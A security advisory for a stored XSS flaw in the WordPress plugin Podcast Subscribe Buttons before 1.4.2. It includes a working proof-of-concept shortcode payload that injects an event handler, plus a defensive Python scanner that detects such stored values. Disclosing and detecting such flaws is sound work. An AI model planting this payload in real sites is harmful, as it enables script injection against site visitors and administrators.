Podcast Subscribe Buttons < 1.4.2 - Contributor+ Stored XSS

2021-09-15T00:00:00
ID WPVDB-ID:998395F0-F176-45B9-BAF7-B50D30538C7D
Type wpvulndb
Reporter apple502j
Modified 2021-09-15T21:24:41

Description

The plugin allows any user whose role can add or edit posts (Contributor and above) to perform stored XSS through the podcast_subscribe shortcode.

PoC

Add the payload below as a shortcode block:

[podcast_subscribe alignment='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']
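One way to check whether values like this are already stored on a site, as an added example that is not part of the original advisory or the plugin's code: the scanner below walks exported post content and flags podcast_subscribe attribute values that contain quote or tag characters or an inline event handler. The (post_id, content) input shape, the function name and the sample posts are assumptions made for the example.

```python
import html
import re

# Shortcode tag taken from the PoC; everything up to the closing bracket is its attribute string.
SHORTCODE_RE = re.compile(r"\[podcast_subscribe\b([^\]]*)\]", re.IGNORECASE)
# name='value', name="value" or name=bareword.
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'"\]]+))""")
# Characters that end an HTML attribute or tag, plus inline event-handler names.
BREAKOUT_RE = re.compile(r"""["'<>]|\bon[a-z]+\s*=""", re.IGNORECASE)

# Constructed sample data: (post_id, post_content) pairs as they might be
# exported from the posts table. Post 102 holds the PoC from the advisory.
SAMPLE_POSTS = [
    (101, "Listen here: [podcast_subscribe alignment='center']"),
    (102, """[podcast_subscribe alignment='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']"""),
    (103, "No shortcode in this post."),
]


def suspicious_shortcodes(posts):
    """Return (post_id, attribute, value) for values that could leave an HTML attribute."""
    findings = []
    for post_id, content in posts:
        for shortcode in SHORTCODE_RE.finditer(content):
            for attr in ATTR_RE.finditer(shortcode.group(1)):
                name = attr.group(1)
                raw = next(g for g in attr.groups()[1:] if g is not None)
                # Editors may store quotes as entities; decode before checking.
                value = html.unescape(raw)
                if BREAKOUT_RE.search(value):
                    findings.append((post_id, name, value))
    return findings


if __name__ == "__main__":
    for post_id, name, value in suspicious_shortcodes(SAMPLE_POSTS):
        print(f"post {post_id}: attribute {name!r} has suspicious value {value!r}")
```

A hit is a lead for manual review of the post and its author, not proof of compromise; updating the plugin to 1.4.2 or later remains the fix.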